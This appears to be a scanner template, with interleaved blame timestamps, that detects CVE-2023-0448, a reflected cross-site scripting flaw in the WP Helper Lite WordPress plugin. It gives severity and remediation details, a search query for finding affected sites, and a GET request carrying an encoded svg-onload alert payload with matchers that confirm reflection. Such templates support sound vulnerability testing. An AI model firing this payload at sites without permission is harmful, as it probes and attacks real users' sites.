2023-07-17 18:18:03 +00:00
id : CVE-2023-0448
info :
name : WP Helper Lite < 4.3 - Cross-Site Scripting
author : ritikchaddha
severity : medium
description : |
The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
reference :
- https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256
- https://nvd.nist.gov/vuln/detail/CVE-2023-0448
2023-08-31 11:46:18 +00:00
remediation : Fixed in version 4.3 and above
2023-07-17 18:18:03 +00:00
classification :
2023-08-31 11:46:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-07-17 18:18:03 +00:00
cve-id : CVE-2023-0448
2023-08-31 11:46:18 +00:00
cwe-id : CWE-79
epss-score : 0.00064
cpe : cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:*
epss-percentile : 0.26173
2023-07-17 18:18:03 +00:00
metadata :
max-request : 1
verified : true
publicwww-query : "/wp-content/plugins/wp-helper-lite"
2023-08-31 11:46:18 +00:00
framework : wordpress
vendor : matbao
product : wp_helper_premium
2023-07-17 18:18:03 +00:00
tags : cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite
http :
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"
matchers :
- type : dsl
dsl :
- 'status_code == 200'
2023-07-18 09:20:20 +00:00
- 'contains(header, "text/html")'
2023-07-17 18:18:03 +00:00
- 'contains(body, "><svg onload=alert(document.domain)>")'
- 'contains(body, "params\":{\"action")'
condition : and